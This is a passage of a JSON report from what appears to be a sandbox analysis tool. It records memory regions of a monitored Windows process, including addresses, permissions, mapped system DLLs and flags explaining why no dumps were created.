"end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1978", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1979", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_1980", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 0, "filename": null, "id": "region_1981", "name": "private_0x0000000000060000", "norm_filename": null, "region_type": "private_memory", "start_va": 393216, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1449983, "entry_point": 0, "filename": null, "id": "region_1982", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1523711, "entry_point": 1507328, "filename": "\\Windows\\System32\\en-US\\taskkill.exe.mui", "id": "region_1983", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_1984", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2584575, "entry_point": 2162688, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1985", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2162688, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_1986", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_1987", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1988", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 5537791, "entry_point": 0, "filename": null, "id": "region_1989", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 7147519, "entry_point": 0, "filename": null, "id": "region_1990", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 28180479, "entry_point": 0, "filename": null, "id": "region_1991", "name": "pagefile_0x00000000006e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7208960, "timestamp": "00:01:23.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1992", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:23.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1993", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:23.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1994", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:23.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1995", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:23.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1200128, "start_va": 8791264264192, "type": "region", "version": 1 }, "end_va": 8791265464319, "entry_point": 8791264264192, "filename": "\\Windows\\System32\\dbghelp.dll", "id": "region_1996", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\system32\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 8791264264192, "timestamp": "00:01:23.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 8791560224768, "type": "region", "version": 1 }, "end_va": 8791560536063, "entry_point": 8791560224768, "filename": "\\Windows\\System32\\framedynos.dll", "id": "region_1997", "name": "framedynos.dll", "norm_filename": "c:\\windows\\system32\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 8791560224768, "timestamp": "00:01:23.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791688151040, "type": "region", "version": 1 }, "end_va": 8791688249343, "entry_point": 8791688155152, "filename": "\\Windows\\System32\\mpr.dll", "id": "region_1998", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 8791688151040, "timestamp": "00:01:23.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791725703168, "type": "region", "version": 1 }, "end_va": 8791725789183, "entry_point": 8791725703168, "filename": "\\Windows\\System32\\wkscli.dll", "id": "region_1999", "name": "wkscli.dll", "norm_filename": "c:\\windows\\system32\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 8791725703168, "timestamp": "00:01:23.588", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791725834240, "type": "region", "version": 1 }, "end_va": 8791725883391, "entry_point": 8791725834240, "filename": "\\Windows\\System32\\netutils.dll", "id": "region_2000", "name": "netutils.dll", "norm_filename": "c:\\windows\\system32\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 8791725834240, "timestamp": "00:01:23.594", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 8791725899776, "type": "region", "version": 1 }, "end_va": 8791725989887, "entry_point": 8791725899776, "filename": "\\Windows\\System32\\netapi32.dll", "id": "region_2001", "name": "netapi32.dll", "norm_filename": "c:\\windows\\system32\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791725899776, "timestamp": "00:01:23.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791729635328, "type": "region", "version": 1 }, "end_va": 8791729704959, "entry_point": 8791729639536, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_2002", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791729635328, "timestamp": "00:01:23.610", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_2003", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:23.610", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791753228288, "type": "region", "version": 1 }, "end_va": 8791753371647, "entry_point": 8791753232792, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_2004", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791753228288, "timestamp": "00:01:23.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791753883648, "type": "region", "version": 1 }, "end_va": 8791753928703, "entry_point": 8791753887792, "filename": "\\Windows\\System32\\secur32.dll", "id": "region_2005", "name": "secur32.dll", "norm_filename": "c:\\windows\\system32\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 8791753883648, "timestamp": "00:01:23.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791754080256, "type": "region", "version": 1 }, "end_va": 8791754231807, "entry_point": 8791754118744, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_2006", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791754080256, "timestamp": "00:01:23.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_2007", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:23.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_2008", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:23.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_2009", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:23.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_2010", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:23.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_2011", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:23.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_2012", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:23.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 315392, "start_va": 8791770726400, "type": "region", "version": 1 }, "end_va": 8791771041791, "entry_point": 8791770730608, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_2013", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 8791770726400, "timestamp": "00:01:23.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_2014", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:23.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_2015", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:23.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_2016", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:23.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_2017", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:23.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_2018", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:23.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791791501312, "type": "region", "version": 1 }, "end_va": 8791791534079, "entry_point": 8791791506692, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_2019", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 8791791501312, "timestamp": "00:01:23.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_2020", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:23.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_2021", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:23.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_2022", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_2023", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 28311552, "type": "region", "version": 1 }, "end_va": 28835839, "entry_point": 0, "filename": null, "id": "region_2024", "name": "private_0x0000000001b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 28311552, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 28835840, "type": "region", "version": 1 }, "end_va": 29622271, "entry_point": 28835840, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_2025", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 28835840, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 30408703, "entry_point": 0, "filename": null, "id": "region_2026", "name": "private_0x0000000001c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 29884416, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 31653888, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_2027", "name": "private_0x0000000001e30000", "norm_filename": null, "region_type": "private_memory", "start_va": 31653888, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791614357504, "type": "region", "version": 1 }, "end_va": 8791614418943, "entry_point": 8791614362064, "filename": "\\Windows\\System32\\wbem\\wbemprox.dll", "id": "region_2028", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\system32\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 8791614357504, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 548864, "start_va": 8791615864832, "type": "region", "version": 1 }, "end_va": 8791616413695, "entry_point": 8791615930320, "filename": "\\Windows\\System32\\wbemcomn.dll", "id": "region_2029", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\system32\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 8791615864832, "timestamp": "00:01:23.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_2030", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:23.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_2031", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:23.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_2032", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:23.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 249856, "start_va": 8791754997760, "type": "region", "version": 1 }, "end_va": 8791755247615, "entry_point": 8791755004148, "filename": "\\Windows\\System32\\winsta.dll", "id": "region_2033", "name": "winsta.dll", "norm_filename": "c:\\windows\\system32\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 8791754997760, "timestamp": "00:01:23.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 30539776, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_2034", "name": "private_0x0000000001d20000", "norm_filename": null, "region_type": "private_memory", "start_va": 30539776, "timestamp": "00:01:23.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 35123199, "entry_point": 32178176, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2035", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32178176, "timestamp": "00:01:23.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_2036", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:23.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_2037", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:23.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not 